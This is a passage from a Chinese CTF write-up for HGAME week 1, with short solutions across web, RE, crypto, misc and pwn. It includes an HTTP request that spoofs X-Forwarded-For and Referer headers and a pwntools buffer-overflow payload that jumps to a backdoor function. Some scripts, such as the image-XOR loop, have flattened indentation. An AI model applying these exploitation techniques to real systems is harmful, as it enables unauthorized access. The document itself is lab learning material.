年末年初忙得想鼠,浅打两下……
Web - Classic Childhood Game
控制台直接执行函数即可
Web - Become A Member
GET / HTTP/1.1
Host: week-1.hgame.lwsec.cn:30637
User-Agent: Cute-Bunny
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: code=Vidar
Upgrade-Insecure-Requests: 1
Referer:bunnybunnybunny.com
X-Forwarded-For:127.0.0.1
Content-Length: 47
{"username":"luckytoday","password":"happy123"}
Web - Guess Who I Am
我写爬虫是一款菜狗(错乱)
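import requests

# Member roster used to look up the answer. The author abbreviated it with
# `...` (Python's Ellipsis), so non-dict entries are skipped during the lookup
# instead of raising TypeError.
al = [{"id": "ba1van4", "intro": "21级 / 不会Re / 不会美工 / 活在梦里 / 喜欢做不会的事情 / ◼◻粉"}, ...]

headers = {
    "Host": "week-1.hgame.lwsec.cn:30812",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
    "Accept": "application/json, text/plain, */*",
    "Connection": "keep-alive",
    "Referer": "http://week-1.hgame.lwsec.cn:30812/",
}
url = "http://week-1.hgame.lwsec.cn:30812"
# Session cookie issued by the challenge. It is replaced with the cookies of the
# last /api/verifyAnswer response each round; this assumes the server re-issues
# the session cookie there — if it does not, the jar becomes empty (confirm).
cookies = {"session": "MTY3MzQ4OTAzN3xEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQTBBQzJOb1lXeHNaVzVuWlVsa0EybHVkQVFDQUVvR2MzUnlhVzVuREFnQUJuTnZiSFpsWkFOcGJuUUVBZ0FFfDz5IcB7f5lvpRwijKnYXmSq29oYpfT9mHQc_w-7c5ce"}

for i in range(100):
    a = requests.get(url + "/api/getQuestion", headers=headers, cookies=cookies)
    b = requests.get(url + "/api/getScore", headers=headers, cookies=cookies)
    # The score endpoint contains the flag once enough answers are correct.
    if "hgame" in b.text:
        print(b.text)
        break
    # The question is a JSON object; parse it as JSON rather than with
    # ast.literal_eval, which cannot handle true/false/null.
    tmp = a.json()
    # Find the roster entry whose intro matches the question. The original
    # left `data` undefined (NameError) when nothing matched.
    data = next(
        ({"id": j["id"]} for j in al if isinstance(j, dict) and j["intro"] == tmp["message"]),
        None,
    )
    if data is None:
        print("no roster entry matches:", tmp["message"])
        break
    c = requests.post(url + "/api/verifyAnswer", headers=headers, cookies=cookies, data=data)
    if "Please get a question first!" in c.text or "rong" in c.text:
        break
    cookies = c.cookies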
RE - test your IDA
常规操作F5
RE - easyasm
异或即可
发现一年多过去自己已经把刚补学的汇编忘得七七八八,好崩溃,这就是老年人吗(……)
RE - easyenc
复制粘贴就完事了
# Byte dump copied from the disassembler, one signed decimal per element.
v8 = '04,-1,-3,9,1,-13,-80,00,00,05,-16,-83,07,06,23,5,-21,23,-3,23,-22,01,-18,1,-22,-79,05,-6,08,01,23,-84,-20,01,-22,-3,-16,05,07,6'
v8 = v8.split(',')
# Each element decodes to one character: add 86, then XOR with 0x32.
f = ''.join(chr((int(value) + 86) ^ 0x32) for value in v8)
RE - encode
复制粘贴就完事了*2
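# Hex-digit dump copied from the binary. Every pair holds the two hex digits of
# one ASCII byte with the low digit first, e.g. "8,6" -> 0x68 -> 'h'.
v5 = '8,6,7,6,1,6,D,6,5,6,B,7,5,6,E,6,3,6,F,6,4,6,5,6,F,5,9,6,3,7,F,5,5,6,1,6,3,7,9,7,F,5,6,6,F,6,2,7,F,5,1,6,F,5,2,7,5,6,6,7,5,6,2,7,3,7,5,6,F,5,5,6,E,6,7,6,9,6,E,6,5,6,5,6,2,7,D,7'
v5 = v5.split(',')
# Reassemble each byte as high digit + low digit and decode it. The original
# iterated range(0, 176, 2), which runs past the end of the 88-element list
# and raises IndexError; bound the loop by the list length instead.
f = ''.join(chr(int(v5[i + 1] + v5[i], 16)) for i in range(0, len(v5) - 1, 2))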
Crypto-兔兔的车票
问就是懒人暴力破解甚至懒得整理代码
from PIL import Image
# from Crypto.Util.number import *
from random import shuffle, randint, getrandbits
# flagImg = Image.open('flag.png')
# width = flagImg.width
# height = flagImg.height
# def makeSourceImg():
# colors = long_to_bytes(getrandbits(width * height * 24))[::-1]
# img = Image.new('RGB', (width, height))
# x = 0
# for i in range(height):
# for j in range(width):
# img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
# x += 3
# return img
# The first ciphertext image fixes the canvas size that every XOR below uses.
flagImg = Image.open('enc0.png')
width, height = flagImg.size
def xorImg(keyImg, sourceImg):
    """Return a new RGB image that is keyImg XOR sourceImg, channel by channel.

    Only the first three channels of each pixel are combined. The output canvas
    is the module-level ``width`` x ``height`` (taken from enc0.png), not the
    operands' own sizes.
    """
    out = Image.new('RGB', (width, height))
    for row in range(height):
        for col in range(width):
            pos = (col, row)
            kp = keyImg.getpixel(pos)
            sp = sourceImg.getpixel(pos)
            out.putpixel(pos, tuple(a ^ b for a, b in zip(kp[:3], sp[:3])))
    return out
"""
source文件夹下面的图片生成过程:
def makeImg():
colors = list(long_to_bytes(getrandbits(width * height * 23)).zfill(width * height * 24))
shuffle(colors)
colors = bytes(colors)
img = Image.new('RGB', (width, height))
x = 0
for i in range(height):
for j in range(width):
img.putpixel((j, i), (colors[x], colors[x + 1], colors[x + 2]))
x += 3
return img
for i in range(15):
im = makeImg()
im.save(f"./source/picture{i}.png")
"""
# n1 = makeSourceImg()
# n2 = makeSourceImg()
# n3 = makeSourceImg()
# nonce = [n1, n2, n3]
index = list(range(16))
shuffle(index)
e=0
"""
这里flag.png已经提前被保存在source文件夹下了,文件名也是picture{xx}.png
"""
# for i in index:
# im = Image.open(f"source/picture{i}.png")
# key = nonce[randint(0, 2)]
# encImg = xorImg(key, im)
# encImg.save(f'pics/enc{e}.png')
# e+=1
for i in index:
im = Image.open(f'pics/enc{e}.png')
for j in range(16):
key = Image.open(f'pics/enc{j}.png')
encImg = xorImg(key, im)
encImg.save(f"source/picture{i}_{j}.png")
e+=1
Crypto-RSA
问就是factordb然后常规操作
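'''
from Crypto.Util.number import *
flag = open('flag.txt', 'rb').read()
p = getPrime(512)
q = getPrime(512)
n=p*q
e = 65537
m = bytes_to_long(flag)
c = pow(m, e, n)
print(f"c={c}")
print(f"n={n}")
"""
c=110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582
n=135127138348299757374196447062640858416920350098320099993115949719051354213545596643216739555453946196078110834726375475981791223069451364024181952818056802089567064926510294124594174478123216516600368334763849206942942824711531334239106807454086389211139153023662266125937481669520771879355089997671125020789
"""
'''
# Textbook RSA with the public key (n, e) and ciphertext c from the challenge.
e = 65537
c = 110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582
n = 135127138348299757374196447062640858416920350098320099993115949719051354213545596643216739555453946196078110834726375475981791223069451364024181952818056802089567064926510294124594174478123216516600368334763849206942942824711531334239106807454086389211139153023662266125937481669520771879355089997671125020789
# Factors of n as looked up on factordb (per the write-up); a modulus whose
# factors are already public gives no security, which is the whole challenge.
p = 11239134987804993586763559028187245057652550219515201768644770733869088185320740938450178816138394844329723311433549899499795775655921261664087997097294813
q = 12022912661420941592569751731802639375088427463430162252113082619617837010913002515450223656942836378041122163833359097910935638423464006252814266959128953
phi = (p - 1) * (q - 1)
# Private exponent via the built-in modular inverse (Python 3.8+); replaces
# gmpy2.invert so the script needs no third-party packages.
d = pow(e, -1, phi)
m = pow(c, d, n)
# Big-endian bytes of m, equivalent to libnum.n2s for a positive integer.
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))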
Crypto-Be Stream
问就是懒到不想改写stream函数
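# from flag import flag
# assert type(flag) == bytes
# XOR is its own inverse, so running the challenge's encryption over the
# ciphertext gives back the plaintext: `flag` here holds the ciphertext.
flag = b'\x1a\x15\x05\t\x17\t\xf5\xa2-\x06\xec\xed\x01-\xc7\xcc2\x1eXA\x1c\x157[\x06\x13/!-\x0b\xd4\x91-\x06\x8b\xd4-\x1e+*\x15-pm\x1f\x17\x1bY'
key = [int.from_bytes(b"Be water", 'big'), int.from_bytes(b"my friend", 'big')]
# Challenge keystream, for reference:
# def stream(i):
#     if i==0:
#         return key[0]%256
#     elif i==1:
#         return key[1]%256
#     else:
#         return (stream(i-2)*7%256 + stream(i-1)*4%256)%256


def _mat_mul(a, b):
    """Multiply two 2x2 integer matrices modulo 256."""
    return [
        [(a[0][0] * b[0][0] + a[0][1] * b[1][0]) % 256, (a[0][0] * b[0][1] + a[0][1] * b[1][1]) % 256],
        [(a[1][0] * b[0][0] + a[1][1] * b[1][0]) % 256, (a[1][0] * b[0][1] + a[1][1] * b[1][1]) % 256],
    ]


def _stream_at(k):
    """Return keystream byte s[k] without materialising the whole sequence.

    The recurrence is s[0] = key[0] % 256, s[1] = key[1] % 256 and
    s[i] = (7*s[i-2] + 4*s[i-1]) % 256. With v_i = (s[i], s[i+1]) it becomes
    v_{i+1} = M v_i for M = [[0, 1], [7, 4]], so s[k] is the first row of M**k
    applied to v_0. Square-and-multiply gives O(log k) per byte; the original
    filled a list of 191,102,978 ints (the largest index used is 24**6),
    which costs gigabytes of memory and minutes of runtime.
    """
    s0, s1 = key[0] % 256, key[1] % 256
    result = [[1, 0], [0, 1]]
    base = [[0, 1], [7, 4]]
    while k:
        if k & 1:
            result = _mat_mul(result, base)
        base = _mat_mul(base, base)
        k >>= 1
    return (result[0][0] * s0 + result[0][1] * s1) % 256


# water = stream((i//2)**6) % 256  -- byte i of the keystream is s[(i//2)**6]
enc = bytes(_stream_at((i // 2) ** 6) ^ byte for i, byte in enumerate(flag))
print(enc)
# print(enc)
# b'\x1a\x15\x05\t\x17\t\xf5\xa2-\x06\xec\xed\x01-\xc7\xcc2\x1eXA\x1c\x157[\x06\x13/!-\x0b\xd4\x91-\x06\x8b\xd4-\x1e+*\x15-pm\x1f\x17\x1bY'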
Crypto-神秘的电话
前几道题偷的懒终究是反噬了.jpg
打开audacity对着手动录了半天,我的老胳膊老腰老眼睛……
----- ..--- ..--- ...-- . ..--.- .--. .-. .. .. -... .-.. -.-- ..--.- ..--.- .... --- -. .-- .- ..--.- .--- -- --. .... ..--.- ..-. --. -.- -.-. --.- .- --- --.- - -- ..-. .-.
另一部分base64解密得到提示“只有倒着翻过十八层的篱笆才能抵达北欧神话的终点”,将摩斯密码解密结果反转,栅栏密码密钥18,维吉尼亚密钥vidar,结束
MISC-Where am I
wireshark导出压缩包,显然是伪加密,将偏移0017h处的24改为20,解压后查看图片详细信息中的GPS
MISC-e99p1ant_want_girlfriend
懒得翻脚本,既然crc校验不正确,高度随便改一下即可
PWN - easy_overflow - 复现
常规操作连上然后卡在错误提示,发觉自己根本不会,笑死
from pwn import *
# Remote challenge endpoint; the author left host and port as "..." placeholders.
p = remote("...","...")
elf = ELF("./vuln")
# Address of the binary's b4ckd0or symbol, resolved from the ELF instead of the
# hard-coded 0x401176 in the commented-out line below.
f_addr = elf.symbols["b4ckd0or"]
#p.sendline(b'a'*0x18+p64(0x401176))
# 0x18 bytes of filler followed by the 8-byte address. Presumably the overflow in
# vuln reaches the saved return address at that offset — confirm against the
# binary; the write-up does not say whether stack protector or PIE are absent,
# which this payload assumes.
p.sendline(b'a'*0x18+p64(f_addr))
p.interactive()
提示standard output: Bad file descriptor
的处理方法:
网友评论